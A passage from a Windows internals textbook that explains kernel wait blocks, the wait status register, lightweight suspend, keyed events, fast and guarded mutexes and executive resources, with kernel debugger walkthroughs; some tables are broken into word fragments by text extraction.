sC
o
m
pl
ete
(1)
The thread wait
associated with this
wait block has now
been properly
synchronized (the
wait satisfaction
has completed), and
the bypass scenario
is now completed.
The wait block is now essentially treated
the same as an inactive wait block
(ignored).
W
ait
Bl
oc
A signal is being
delivered to the
thread while the
lightweight suspend
The wait block is treated essentially the
same as a WaitBlockBypassStart.
kS
us
pe
nd
By
pa
ss
St
art
(2)
has not yet been
committed.
W
ait
Bl
oc
kS
us
pe
nd
By
pa
ss
Co
m
pl
ete
(3)
The lightweight
suspend associated
with this wait block
has now been
properly
synchronized.
The wait block now behaves like a
WaitBlockSuspended.
Finally, we mentioned the existence of a wait status register. With the
removal of the global kernel dispatcher lock in Windows 7, the overall state
of the thread (or any of the objects it is being required to start waiting on) can
now change while wait operations are still being set up. Since there’s no
longer any global state synchronization, there is nothing to stop another
thread—executing on a different logical processor—from signaling one of
the objects being waited, or alerting the thread, or even sending it an APC.
As such, the kernel dispatcher keeps track of a couple of additional data
points for each waiting thread object: the current fine-grained wait state of
the thread (KWAIT_STATE, not to be confused with the wait block state) and
any pending state changes that could modify the result of an ongoing wait
operation. These two pieces of data are what make up the wait status register
(KWAIT_STATUS_REGISTER).
When a thread is instructed to wait for a given object (such as due to a
WaitForSingleObject call), it first attempts to enter the in-progress wait state
(WaitInProgress) by beginning the wait. This operation succeeds if there are
no pending alerts to the thread at the moment (based on the alertability of the
wait and the current processor mode of the wait, which determine whether
the alert can preempt the wait). If there is an alert, the wait is not entered at
all, and the caller receives the appropriate status code; otherwise, the thread
now enters the WaitInProgress state, at which point the main thread state is
set to Waiting, and the wait reason and wait time are recorded, with any
timeout specified also being registered.
Once the wait is in progress, the thread can initialize the wait blocks as
needed (and mark them as WaitBlockActive in the process) and then proceed
to lock all the objects that are part of this wait. Because each object has its
own lock, it is important that the kernel be able to maintain a consistent
locking ordering scheme when multiple processors might be analyzing a wait
chain consisting of many objects (caused by a WaitForMultipleObjects call).
The kernel uses a technique known as address ordering to achieve this:
because each object has a distinct and static kernel-mode address, the objects
can be ordered in monotonically increasing address order, guaranteeing that
locks are always acquired and released in the same order by all callers. This
means that the caller-supplied array of objects will be duplicated and sorted
accordingly.
The next step is to check for immediate satisfaction of the wait, such as
when a thread is being told to wait on a mutex that has already been released
or an event that is already signaled. In such cases, the wait is immediately
satisfied, which involves unlinking the associated wait blocks (however, in
this case, no wait blocks have yet been inserted) and performing a wait exit
(processing any pending scheduler operations marked in the wait status
register). If this shortcut fails, the kernel next attempts to check whether the
timeout specified for the wait (if any) has already expired. In this case, the
wait is not “satisfied” but merely “timed out,” which results in slightly faster
processing of the exit code, albeit with the same result.
If none of these shortcuts were effective, the wait block is inserted into the
thread’s wait list, and the thread now attempts to commit its wait.
(Meanwhile, the object lock or locks have been released, allowing other
processors to modify the state of any of the objects that the thread is now
supposed to attempt waiting on.) Assuming a noncontended scenario, where
other processors are not interested in this thread or its wait objects, the wait
switches into the committed state as long as there are no pending changes
marked by the wait status register. The commit operation links the waiting
thread in the PRCB list, activates an extra wait queue thread if needed, and
inserts the timer associated with the wait timeout, if any. Because potentially
quite a lot of cycles have elapsed by this point, it is again possible that the
timeout has already elapsed. In this scenario, inserting the timer causes
immediate signaling of the thread and thus a wait satisfaction on the timer
and the overall timeout of the wait. Otherwise, in the much more common
scenario, the CPU now context-switches away to the next thread that is ready
for execution. (See Chapter 4 of Part 1 for more information on scheduling.)
In highly contended code paths on multiprocessor machines, it is possible
and likely that the thread attempting to commit its wait has experienced a
change while its wait was still in progress. One possible scenario is that one
of the objects it was waiting on has just been signaled. As touched upon
earlier, this causes the associated wait block to enter the
WaitBlockBypassStart state, and the thread’s wait status register now shows
the WaitAborted wait state. Another possible scenario is for an alert or APC
to have been issued to the waiting thread, which does not set the WaitAborted
state but enables one of the corresponding bits in the wait status register.
Because APCs can break waits (depending on the type of APC, wait mode,
and alertability), the APC is delivered, and the wait is aborted. Other
operations that modify the wait status register without generating a full abort
cycle include modifications to the thread’s priority or affinity, which are
processed when exiting the wait due to failure to commit, as with the
previous cases mentioned.
As we briefly touched upon earlier, and in Chapter 4 of Part 1 in the
scheduling section, recent versions of Windows implemented a lightweight
suspend mechanism when SuspendThread and ResumeThread are used,
which no longer always queues an APC that then acquires the suspend event
embedded in the thread object. Instead, if the following conditions are true,
an existing wait is instead converted into a suspend state:
■ KiDisableLightWeightSuspend is 0 (administrators can use the
DisableLightWeightSuspend value in the
HKLM\SYSTEM\CurrentControlSet\Session Manager\Kernel
registry key to turn off this optimization).
■ The thread state is Waiting—that is, the thread is already in a wait
state.
■ The wait status register is set to WaitCommitted—that is, the thread’s
wait has been fully engaged.
■ The thread is not an UMS primary or scheduled thread (see Chapter 4
of Part 1 for more information on User Mode Scheduling) because
these require additional logic implemented in the scheduler’s suspend
APC.
■ The thread issued a wait while at IRQL 0 (passive level) because
waits at APC_LEVEL require special handling that only the suspend
APC can provide.
■ The thread does not have APCs currently disabled, nor is there an
APC in progress, because these situations require additional
synchronization that only the delivery of the scheduler’s suspend APC
can achieve.
■ The thread is not currently attached to a different process due to a call
to KeStackAttachProcess because this requires special handling just
like the preceding bullet.
■ If the first wait block associated with the thread’s wait is not in a
WaitBlockInactive block state, its wait type must be WaitAll;
otherwise, this means that the there’s at least one active
WaitAny block.
As the preceding list of criteria is hinting, this conversion happens by
taking any currently active wait blocks and converting them to a
WaitBlockSuspended state instead. If the wait block is currently pointing to
an object, it is unlinked from its dispatcher header’s wait list (such that
signaling the object will no longer wake up this thread). If the thread had a
timer associated with it, it is canceled and removed from the thread’s wait
block array, and a flag is set to remember that this was done. Finally, the
original wait mode (Kernel or User) is also preserved in a flag as well.
Because it no longer uses a true wait object, this mechanism required the
introduction the three additional wait block states shown in Table 8-28 as
well as four new wait states: WaitSuspendInProgress, WaitSuspended,
WaitResumeInProgress, and WaitResumeAborted. These new states behave
in a similar manner to their regular counterparts but address the same
possible race conditions described earlier during a lightweight suspend
operation.
For example, when a thread is resumed, the kernel detects whether it was
placed in a lightweight suspend state and essentially undoes the operation,
setting the wait register to WaitResumeInProgress. Each wait block is then
enumerated, and for any block in the WaitBlockSuspended state, it is placed
in WaitBlockActive and linked back into the object’s dispatcher header’s wait
block list, unless the object became signaled in the meantime, in which case
it is made WaitBlockInactive instead, just like in a regular wake operation.
Finally, if the thread had a timeout associated with its wait that was canceled,
the thread’s timer is reinserted into the timer table, maintaining its original
expiration (timeout) time.
Figure 8-39 shows the relationship of dispatcher objects to wait blocks to
threads to PRCB (it assumes the threads are eligible for stack swapping). In
this example, CPU 0 has two waiting (committed) threads: Thread 1 is
waiting for object B, and thread 2 is waiting for objects A and B. If object A
is signaled, the kernel sees that because thread 2 is also waiting for another
object, thread 2 can’t be readied for execution. On the other hand, if object B
is signaled, the kernel can ready thread 1 for execution right away because it
isn’t waiting for any other objects. (Alternatively, if thread 1 was also
waiting for other objects but its wait type was a WaitAny, the kernel could
still wake it up.)
Figure 8-39 Wait data structures.
EXPERIMENT: Looking at wait queues
You can see the list of objects a thread is waiting for with the
kernel debugger’s !thread command. For example, the following
excerpt from the output of a !process command shows that the
thread is waiting for an event object:
Click here to view code image
lkd> !process 0 4 explorer.exe
THREAD ffff898f2b345080 Cid 27bc.137c Teb:
00000000006ba000
Win32Thread: 0000000000000000 WAIT: (UserRequest)
UserMode Non-Alertable
ffff898f2b64ba60 SynchronizationEvent
You can use the dx command to interpret the dispatcher header
of the object like this:
Click here to view code image
lkd> dx (nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60
(nt!_DISPATCHER_HEADER*)0xffff898f2b64ba60:
0xffff898f2b64ba60 [Type: _DISPATCHER_HEADER*]
[+0x000] Lock : 393217 [Type: long]
[+0x000] LockNV : 393217 [Type: long]
[+0x000] Type : 0x1 [Type: unsigned char]
[+0x001] Signalling : 0x0 [Type: unsigned char]
[+0x002] Size : 0x6 [Type: unsigned char]
[+0x003] Reserved1 : 0x0 [Type: unsigned char]
[+0x000] TimerType : 0x1 [Type: unsigned char]
[+0x001] TimerControlFlags : 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Absolute : 0x0 [Type: unsigned
char]
[+0x001 ( 1: 1)] Wake : 0x0 [Type: unsigned
char]
[+0x001 ( 7: 2)] EncodedTolerableDelay : 0x0 [Type:
unsigned char]
[+0x002] Hand : 0x6 [Type: unsigned char]
[+0x003] TimerMiscFlags : 0x0 [Type: unsigned char]
[+0x003 ( 5: 0)] Index : 0x0 [Type: unsigned
char]
[+0x003 ( 6: 6)] Inserted : 0x0 [Type: unsigned
char]
[+0x003 ( 7: 7)] Expired : 0x0 [Type: unsigned
char]
[+0x000] Timer2Type : 0x1 [Type: unsigned char]
[+0x001] Timer2Flags : 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Timer2Inserted : 0x0 [Type: unsigned
char]
[+0x001 ( 1: 1)] Timer2Expiring : 0x0 [Type: unsigned
char]
[+0x001 ( 2: 2)] Timer2CancelPending : 0x0 [Type:
unsigned char]
[+0x001 ( 3: 3)] Timer2SetPending : 0x0 [Type: unsigned
char]
[+0x001 ( 4: 4)] Timer2Running : 0x0 [Type: unsigned
char]
[+0x001 ( 5: 5)] Timer2Disabled : 0x0 [Type: unsigned
char]
[+0x001 ( 7: 6)] Timer2ReservedFlags : 0x0 [Type:
unsigned char]
[+0x002] Timer2ComponentId : 0x6 [Type: unsigned char]
[+0x003] Timer2RelativeId : 0x0 [Type: unsigned char]
[+0x000] QueueType : 0x1 [Type: unsigned char]
[+0x001] QueueControlFlags : 0x0 [Type: unsigned char]
[+0x001 ( 0: 0)] Abandoned : 0x0 [Type: unsigned
char]
[+0x001 ( 1: 1)] DisableIncrement : 0x0 [Type: unsigned
char]
[+0x001 ( 7: 2)] QueueReservedControlFlags : 0x0 [Type:
unsigned char]
[+0x002] QueueSize : 0x6 [Type: unsigned char]
[+0x003] QueueReserved : 0x0 [Type: unsigned char]
[+0x000] ThreadType : 0x1 [Type: unsigned char]
[+0x001] ThreadReserved : 0x0 [Type: unsigned char]
[+0x002] ThreadControlFlags : 0x6 [Type: unsigned char]
[+0x002 ( 0: 0)] CycleProfiling : 0x0 [Type: unsigned
char]
[+0x002 ( 1: 1)] CounterProfiling : 0x1 [Type: unsigned
char]
[+0x002 ( 2: 2)] GroupScheduling : 0x1 [Type: unsigned
char]
[+0x002 ( 3: 3)] AffinitySet : 0x0 [Type: unsigned
char]
[+0x002 ( 4: 4)] Tagged : 0x0 [Type: unsigned
char]
[+0x002 ( 5: 5)] EnergyProfiling : 0x0 [Type: unsigned
char]
[+0x002 ( 6: 6)] SchedulerAssist : 0x0 [Type: unsigned
char]
[+0x002 ( 7: 7)] ThreadReservedControlFlags : 0x0 [Type:
unsigned char]
[+0x003] DebugActive : 0x0 [Type: unsigned char]
[+0x003 ( 0: 0)] ActiveDR7 : 0x0 [Type: unsigned
char]
[+0x003 ( 1: 1)] Instrumented : 0x0 [Type: unsigned
char]
[+0x003 ( 2: 2)] Minimal : 0x0 [Type: unsigned
char]
[+0x003 ( 5: 3)] Reserved4 : 0x0 [Type: unsigned
char]
[+0x003 ( 6: 6)] UmsScheduled : 0x0 [Type: unsigned
char]
[+0x003 ( 7: 7)] UmsPrimary : 0x0 [Type: unsigned
char]
[+0x000] MutantType : 0x1 [Type: unsigned char]
[+0x001] MutantSize : 0x0 [Type: unsigned char]
[+0x002] DpcActive : 0x6 [Type: unsigned char]
[+0x003] MutantReserved : 0x0 [Type: unsigned char]
[+0x004] SignalState : 0 [Type: long]
[+0x008] WaitListHead [Type: _LIST_ENTRY]
[+0x000] Flink : 0xffff898f2b3451c0
[Type: _LIST_ENTRY *]
[+0x008] Blink : 0xffff898f2b3451c0
[Type: _LIST_ENTRY *]
Because this structure is a union, you should ignore any values
that do not correspond to the given object type because they are not
relevant to it. Unfortunately, it is not easy to tell which fields are
relevant to which type, other than by looking at the Windows
kernel source code or the WDK header files’ comments. For
convenience, Table 8-29 lists the dispatcher header flags and the
objects to which they apply.
Table 8-29 Usage and meaning of the dispatcher header flags
Fla
g
Applie
s To
Meaning
Typ
e
All
dispatc
her
objects
Value from the KOBJECTS enumeration
that identifies the type of dispatcher object
that this is.
Loc
k
All
objects
Used for locking an object during wait
operations that need to modify its state or
linkage; actually corresponds to bit 7 (0x80)
of the Type field.
Sig
nali
ng
Gates
A priority boost should be applied to the
woken thread when the gate is signaled.
Size
Events,
Semap
hores,
Gates,
Process
es
Size of the object divided by 4 to fit in a
single byte.
Tim
er2
Typ
e
Idle
Resilie
nt
Timers
Mapping of the Type field.
Tim
er2I
nse
rted
Idle
Resilie
nt
Timers
Set if the timer was inserted into the timer
handle table.
Tim
er2
Exp
irin
g
Idle
Resilie
nt
Timers
Set if the timer is undergoing expiration.
Tim
er2
Can
cel
Pen
din
g
Idle
Resilie
nt
Timers
Set if the timer is being canceled.
Tim
er2
Set
Pen
din
Idle
Resilie
nt
Timers
Set if the timer is being registered.
g
Tim
er2
Run
nin
g
Idle
Resilie
nt
Timers
Set if the timer’s callback is currently active.
Tim
er2
Dis
abl
ed
Idle
Resilie
nt
Timers
Set if the timer has been disabled.
Tim
er2
Co
mp
one
ntId
Idle
Resilie
nt
Timers
Identifies the well-known component
associated with the timer.
Tim
er2
Rel
ativ
eId
Idle
Resilie
nt
Timers
Within the component ID specified earlier,
identifies which of its timers this is.
Tim
erT
ype
Timers
Mapping of the Type field.
Abs
olut
e
Timers
The expiration time is absolute, not relative.
Wa
ke
Timers
This is a wakeable timer, meaning it should
exit a standby state when signaled.
Enc
ode
dTo
lera
ble
Del
ay
Timers
The maximum amount of tolerance (shifted
as a power of two) that the timer can support
when running outside of its expected
periodicity.
Ha
nd
Timers
Index into the timer handle table.
Ind
ex
Timers
Index into the timer expiration table.
Inse
rted
Timers
Set if the timer was inserted into the timer
handle table.
Exp
ired
Timers
Set if the timer has already expired.
Thr
ead
Typ
e
Thread
s
Mapping of the Type field.
Thr
ead
Res
erv
ed
Thread
s
Unused.
Cyc
Thread
CPU cycle profiling has been enabled for
leP
rofi
ling
s
this thread.
Cou
nter
Pro
filin
g
Thread
s
Hardware CPU performance counter
monitoring/profiling has been enabled for
this thread.
Gro
upS
che
duli
ng
Thread
s
Scheduling groups have been enabled for
this thread, such as when running under
DFSS mode (Distributed Fair-Share
Scheduler) or with a Job Object that
implements CPU throttling.
Affi
nity
Set
Thread
s
The thread has a CPU Set associated with it.
Tag
ged
Thread
s
The thread has been assigned a property tag.
Ene
rgy
Pro
filin
g
Thread
s
Energy estimation is enabled for the process
that this thread belongs to.
Sch
edu
ler
Assi
st
Thread
s
The Hyper-V XTS (eXTended Scheduler) is
enabled, and this thread belongs to a virtual
processor (VP) thread inside of a VM
minimal process.
Inst
Thread
Specifies whether the thread has a user-mode
rum
ente
d
s
instrumentation callback.
Acti
veD
R7
Thread
s
Hardware breakpoints are being used, so
DR7 is active and should be sanitized during
context operations. This flag is also
sometimes called DebugActive.
Min
ima
l
Thread
s
This thread belongs to a minimal process.
AltS
ysc
all
Thread
s
An alternate system call handler has been
registered for the process that owns this
thread, such as a Pico Provider or a Windows
CE PAL.
Um
sSc
hed
ule
d
Thread
s
This thread is a UMS Worker (scheduled)
thread.
Um
sPri
mar
y
Thread
s
This thread is a UMS Scheduler (primary)
thread.
Mut
ant
Typ
e
Mutant
s
Mapping of the Type field.
Mut
Mutant
Unused.
ant
Size
s
Dpc
Acti
ve
Mutant
s
The mutant was acquired during a DPC.
Mut
ant
Res
erv
ed
Mutant
s
Unused.
Que
ueT
ype
Queues
Mapping of the Type field.
Aba
ndo
ned
Queues
The queue no longer has any threads that are
waiting on it.
Dis
abl
eIn
cre
men
t
Queues
No priority boost should be given to a thread
waking up to handle a packet on the queue.
Finally, the dispatcher header also has the SignalState field,
which we previously mentioned, and the WaitListHead, which was
also described. Keep in mind that when the wait list head pointers
are identical, this can either mean that there are no threads waiting
or that one thread is waiting on this object. You can tell the
difference if the identical pointer happens to be the address of the
list itself—which indicates that there’s no waiting thread at all. In
the earlier example, 0XFFFF898F2B3451C0 was not the address
of the list, so you can dump the wait block as follows:
Click here to view code image
lkd> dx (nt!_KWAIT_BLOCK*)0xffff898f2b3451c0
(nt!_KWAIT_BLOCK*)0xffff898f2b3451c0 :
0xffff898f2b3451c0 [Type: _KWAIT_BLOCK *]
[+0x000] WaitListEntry [Type: _LIST_ENTRY]
[+0x010] WaitType : 0x1 [Type: unsigned char]
[+0x011] BlockState : 0x4 [Type: unsigned char]
[+0x012] WaitKey : 0x0 [Type: unsigned short]
[+0x014] SpareLong : 6066 [Type: long]
[+0x018] Thread : 0xffff898f2b345080 [Type:
_KTHREAD *]
[+0x018] NotificationQueue : 0xffff898f2b345080 [Type:
_KQUEUE *]
[+0x020] Object : 0xffff898f2b64ba60 [Type:
void *]
[+0x028] SparePtr : 0x0 [Type: void *]
In this case, the wait type indicates a WaitAny, so we know that
there is a thread blocking on the event, whose pointer we are given.
We also see that the wait block is active. Next, we can investigate a
few wait-related fields in the thread structure:
Click here to view code image
lkd> dt nt!_KTHREAD 0xffff898f2b345080 WaitRegister.State
WaitIrql WaitMode WaitBlockCount
WaitReason WaitTime
+0x070 WaitRegister :
+0x000 State : 0y001
+0x186 WaitIrql : 0 ''
+0x187 WaitMode : 1 ''
+0x1b4 WaitTime : 0x39b38f8
+0x24b WaitBlockCount : 0x1 ''
+0x283 WaitReason : 0x6 ''
The data shows that this is a committed wait that was performed
at IRQL 0 (Passive Level) with a wait mode of UserMode, at the
time shown in 15 ms clock ticks since boot, with the reason
indicating a user-mode application request. We can also see that
this is the only wait block this thread has, meaning that it is not
waiting for any other object.
If the wait list head had more than one entry, you could’ve
executed the same commands on the second pointer value in the
WaitListEntry field of the wait block (and eventually executing
!thread on the thread pointer in the wait block) to traverse the list
and see what other threads are waiting for the object. If those
threads were waiting for more than one object, you’d have to look
at their WaitBlockCount to see how many other wait blocks were
present, and simply keep incrementing the pointer by
sizeof(KWAIT_BLOCK).
Another possibility is that the wait type would have been
WaitNotification, at which point you’d have used the notification
queue pointer instead to dump the Queue (KQUEUE) structure,
which is itself a dispatcher object. Potentially, it would also have
had its own nonempty wait block list, which would have revealed
the wait block associated with the worker thread that will be
asynchronously receiving the notification that the object has been
signaled. To determine which callback would eventually execute,
you would have to dump user-mode thread pool data structures.
Keyed events
A synchronization object called a keyed event bears special mention because
of the role it played in user-mode-exclusive synchronization primitives and
the development of the alert-by-ID primitive, which you’ll shortly realize is
Windows’ equivalent of the futex in the Linux operating system (a well-
studied computer science concept). Keyed events were originally
implemented to help processes deal with low-memory situations when using
critical sections, which are user-mode synchronization objects that we’ll see
more about shortly. A keyed event, which is not documented, allows a thread
to specify a “key” for which it waits, where the thread wakes when another
thread of the same process signals the event with the same key. As we
pointed out, if this sounds familiar to the alerting mechanism, it is because
keyed events were its precursor.
If there was contention, EnterCriticalSection would dynamically allocate
an event object, and the thread wanting to acquire the critical section would
wait for the thread that owns the critical section to signal it in
LeaveCriticalSection. Clearly, this introduces a problem during low-memory
conditions: critical section acquisition could fail because the system was
unable to allocate the event object required. In a pathological case, the low-
memory condition itself might have been caused by the application trying to
acquire the critical section, so the system would deadlock in this situation.
Low memory wasn’t the only scenario that could cause this to fail—a less
likely scenario was handle exhaustion. If the process reached its handle limit,
the new handle for the event object could fail.
It might seem that preallocating a global standard event object, similar to
the reserve objects we talked about previously, would fix the issue. However,
because a process can have multiple critical sections, each of which can have
its own locking state, this would require an unknown number of preallocated
event objects, and the solution doesn’t work. The main feature of keyed
events, however, was that a single event could be reused among different
threads, as long as each one provided a different key to distinguish itself. By
providing the virtual address of the critical section itself as the key, this
effectively allows multiple critical sections (and thus, waiters) to use the
same keyed event handle, which can be preallocated at process startup time.
When a thread signals a keyed event or performs a wait on it, it uses a
unique identifier called a key, which identifies the instance of the keyed event
(an association of the keyed event to a single critical section). When the
owner thread releases the keyed event by signaling it, only a single thread
waiting on the key is woken up (the same behavior as synchronization events,
in contrast to notification events). Going back to our use case of critical
sections using their address as a key, this would imply that each process still
needs its own keyed event because virtual addresses are obviously unique to
a single process address space. However, it turns out that the kernel can wake
only the waiters in the current process so that the key is even isolated across
processes, meaning that there can be only a single keyed event object for the
entire system.
As such, when EnterCriticalSection called NtWaitForKeyedEvent to
perform a wait on the keyed event, it gave a NULL handle as parameter for
the keyed event, telling the kernel that it was unable to create a keyed event.
The kernel recognizes this behavior and uses a global keyed event named
ExpCritSecOutOfMemoryEvent. The primary benefit is that processes don’t
need to waste a handle for a named keyed event anymore because the kernel
keeps track of the object and its references.
However, keyed events were more than just a fallback object for low-
memory conditions. When multiple waiters are waiting on the same key and
need to be woken up, the key is signaled multiple times, which requires the
object to keep a list of all the waiters so that it can perform a “wake”
operation on each of them. (Recall that the result of signaling a keyed event
is the same as that of signaling a synchronization event.) However, a thread
can signal a keyed event without any threads on the waiter list. In this
scenario, the signaling thread instead waits on the event itself.
Without this fallback, a signaling thread could signal the keyed event
during the time that the user-mode code saw the keyed event as unsignaled
and attempt a wait. The wait might have come after the signaling thread
signaled the keyed event, resulting in a missed pulse, so the waiting thread
would deadlock. By forcing the signaling thread to wait in this scenario, it
actually signals the keyed event only when someone is looking (waiting).
This behavior made them similar, but not identical, to the Linux futex, and
enabled their usage across a number of user-mode primitives, which we’ll see
shortly, such as Slim Read Writer (SRW) Locks.
Note
When the keyed-event wait code needs to perform a wait, it uses a built-in
semaphore located in the kernel-mode thread object (ETHREAD) called
KeyedWaitSemaphore. (This semaphore shares its location with the ALPC
wait semaphore.) See Chapter 4 of Part 1 for more information on thread
objects.
Keyed events, however, did not replace standard event objects in the
critical section implementation. The initial reason, during the Windows XP
timeframe, was that keyed events did not offer scalable performance in
heavy-usage scenarios. Recall that all the algorithms described were meant to
be used only in critical, low-memory scenarios, when performance and
scalability aren’t all that important. To replace the standard event object
would’ve placed strain on keyed events that they weren’t implemented to
handle. The primary performance bottleneck was that keyed events
maintained the list of waiters described in a doubly linked list. This kind of
list has poor traversal speed, meaning the time required to loop through the
list. In this case, this time depended on the number of waiter threads. Because
the object is global, dozens of threads could be on the list, requiring long
traversal times every single time a key was set or waited on.
Note
The head of the list is kept in the keyed event object, whereas the threads
are linked through the KeyedWaitChain field (which is shared with the
thread’s exit time, stored as a LARGE_INTEGER, the same size as a
doubly linked list) in the kernel-mode thread object (ETHREAD). See
Chapter 4 of Part 1 for more information on this object.
Windows Vista improved keyed-event performance by using a hash table
instead of a linked list to hold the waiter threads. This optimization is what
ultimately allowed Windows to include the three new lightweight user-mode
synchronization primitives (to be discussed shortly) that all depended on the
keyed event. Critical sections, however, continued to use event objects,
primarily for application compatibility and debugging, because the event
object and internals are well known and documented, whereas keyed events
are opaque and not exposed to the Win32 API.
With the introduction of the new alerting by Thread ID capabilities in
Windows 8, however, this all changed again, removing the usage of keyed
events across the system (save for one situation in init once synchronization,
which we’ll describe shortly). And, as more time had passed, the critical
section structure eventually dropped its usage of a regular event object and
moved toward using this new capability as well (with an application
compatibility shim that can revert to using the original event object if
needed).
Fast mutexes and guarded mutexes
Fast mutexes, which are also known as executive mutexes, usually offer
better performance than mutex objects because, although they are still built
on a dispatcher object—an event—they perform a wait only if the fast mutex
is contended. Unlike a standard mutex, which always attempts the acquisition
through the dispatcher, this gives the fast mutex especially good performance
in contended environments. Fast mutexes are used widely in device drivers.
This efficiency comes with costs, however, as fast mutexes are only
suitable when all kernel-mode APC (described earlier in this chapter)
delivery can be disabled, unlike regular mutex objects that block only normal
APC delivery. Reflecting this, the executive defines two functions for
acquiring them: ExAcquireFastMutex and ExAcquireFastMutexUnsafe. The
former function blocks all APC delivery by raising the IRQL of the processor
to APC level. The latter, “unsafe” function, expects to be called with all
kernel-mode APC delivery already disabled, which can be done by raising
the IRQL to APC level. ExTryToAcquireFastMutex performs similarly to the
first, but it does not actually wait if the fast mutex is already held, returning
FALSE instead. Another limitation of fast mutexes is that they can’t be
acquired recursively, unlike mutex objects.
In Windows 8 and later, guarded mutexes are identical to fast mutexes but
are acquired with KeAcquireGuardedMutex and
KeAcquireGuardedMutexUnsafe. Like fast mutexes, a
KeTryToAcquireGuardedMutex method also exists.
Prior to Windows 8, these functions did not disable APCs by raising the
IRQL to APC level, but by entering a guarded region instead, which set
special counters in the thread’s object structure to disable APC delivery until
the region was exited, as we saw earlier. On older systems with a PIC (which
we also talked about earlier in this chapter), this was faster than touching the
IRQL. Additionally, guarded mutexes used a gate dispatcher object, which
was slightly faster than an event—another difference that is no longer true.
Another problem related to the guarded mutex was the kernel function
KeAreApcsDisabled. Prior to Windows Server 2003, this function indicated
whether normal APCs were disabled by checking whether the code was
running inside a critical section. In Windows Server 2003, this function was
changed to indicate whether the code was in a critical or guarded region,
changing the functionality to also return TRUE if special kernel APCs are
also disabled.
Because there are certain operations that drivers should not perform when
special kernel APCs are disabled, it made sense to call KeGetCurrentIrql to
check whether the IRQL is APC level or not, which was the only way special
kernel APCs could have been disabled. However, with the introduction of
guarded regions and guarded mutexes, which were heavily used even by the
memory manager, this check failed because guarded mutexes did not raise
IRQL. Drivers then had to call KeAreAllApcsDisabled for this purpose,
which also checked whether special kernel APCs were disabled through a
guarded region. These idiosyncrasies, combined with fragile checks in Driver
Verifier causing false positives, ultimately all led to the decision to simply
make guarded mutexes revert to just being fast mutexes.
Executive resources
Executive resources are a synchronization mechanism that supports shared
and exclusive access; like fast mutexes, they require that all kernel-mode
APC delivery be disabled before they are acquired. They are also built on
dispatcher objects that are used only when there is contention. Executive
resources are used throughout the system, especially in file-system drivers,
because such drivers tend to have long-lasting wait periods in which I/O
should still be allowed to some extent (such as reads).
Threads waiting to acquire an executive resource for shared access wait for
a semaphore associated with the resource, and threads waiting to acquire an
executive resource for exclusive access wait for an event. A semaphore with
unlimited count is used for shared waiters because they can all be woken and
granted access to the resource when an exclusive holder releases the resource
simply by signaling the semaphore. When a thread waits for exclusive access
of a resource that is currently owned, it waits on a synchronization event
object because only one of the waiters will wake when the event is signaled.
In the earlier section on synchronization events, it was mentioned that some
event unwait operations can actually cause a priority boost. This scenario
occurs when executive resources are used, which is one reason why they also
track ownership like mutexes do. (See Chapter 4 of Part 1 for more
information on the executive resource priority boost.)
Because of the flexibility that shared and exclusive access offer, there are
several functions for acquiring resources: ExAcquireResourceSharedLite,
ExAcquireResourceExclusiveLite, ExAcquireSharedStarveExclusive, and
ExAcquireShareWaitForExclusive. These functions are documented in the
WDK.
Recent versions of Windows also added fast executive resources that use
identical API names but add the word “fast,” such as
ExAcquireFastResourceExclusive, ExReleaseFastResource, and so on. These
are meant to be faster replacements due to different handling of lock
ownership, but no component uses them other than the Resilient File System
(ReFS). During highly contended file system access, ReFS has slightly better
performance than NTFS, in part due to the faster locking.
EXPERIMENT: Listing acquired executive resources
The kernel debugger !locks command uses the kernel’s linked list
of executive resources and dumps their state. By default, the
command lists only executive resources that are currently owned,
but the –d option is documented as listing all executive resources—
unfortunately, this is no longer the case. However, you can still use
the -v flag to dump verbose information on all resources instead.
Here is partial output of the command:
Click here to view code image
lkd> !locks -v
**** DUMP OF ALL RESOURCE OBJECTS ****
Resource @ nt!ExpFirmwareTableResource (0xfffff8047ee34440)
Available
Resource @ nt!PsLoadedModuleResource (0xfffff8047ee48120)
Available
Contention Count = 2
Resource @ nt!SepRmDbLock (0xfffff8047ef06350) Available
Contention Count = 93
Resource @ nt!SepRmDbLock (0xfffff8047ef063b8) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06420) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06488) Available
Resource @ nt!SepRmGlobalSaclLock (0xfffff8047ef062b0)
Available
Resource @ nt!SepLsaAuditQueueInfo (0xfffff8047ee6e010)
Available
Resource @ nt!SepLsaDeletedLogonQueueInfo
(0xfffff8047ee6ded0) Available
Resource @ 0xffff898f032a8550 Available
Resource @ nt!PnpRegistryDeviceResource (0xfffff8047ee62b00)
Available
Contention Count = 27385
Resource @ nt!PopPolicyLock (0xfffff8047ee458c0)
Available
Contention Count = 14
Resource @ 0xffff898f032a8950 Available
Resource @ 0xffff898f032a82d0 Available
Note that the contention count, which is extracted from the
resource structure, records the number of times threads have tried
to acquire the resource and had to wait because it was already
owned. On a live system where you break in with the debugger,
you might be lucky enough to catch a few held resources, as shown
in the following output:
Click here to view code image
2: kd> !locks
**** DUMP OF ALL RESOURCE OBJECTS ****
KD: Scanning for held locks.....
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks....
Resource @ 0xffffde07a2bfb350 Shared 1 owning threads
Contention Count = 2
Threads: ffffde07a9374080-01<*>
KD: Scanning for held
locks.......................................................
....
Resource @ 0xffffde07a8070c00 Shared 1 owning threads
Threads: ffffde07aa3f1083-01<*> *** Actual Thread
ffffde07aa3f1080
KD: Scanning for held
locks.......................................................
....
Resource @ 0xffffde07a8995900 Exclusively owned
Threads: ffffde07a9374080-01<*>
KD: Scanning for held
locks.......................................................
....
9706 total locks, 4 locks currently held
You can examine the details of a specific resource object,
including the thread that owns the resource and any threads that are
waiting for the resource, by specifying the –v switch and the
address of the resource, if you find one that’s currently acquired
(owned). For example, here’s a held shared resource that seems to
be associated with NTFS, while a thread is attempting to read from
the file system:
Click here to view code image
2: kd> !locks -v 0xffffde07a33d6a28
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
THREAD ffffde07a9374080 Cid 0544.1494 Teb:
000000ed8de12000
Win32Thread: 0000000000000000 WAIT: (Executive)
KernelMode Non-Alertable
ffff8287943a87b8 NotificationEvent
IRP List:
ffffde07a936da20: (0006,0478) Flags: 00020043 Mdl:
ffffde07a8a75950
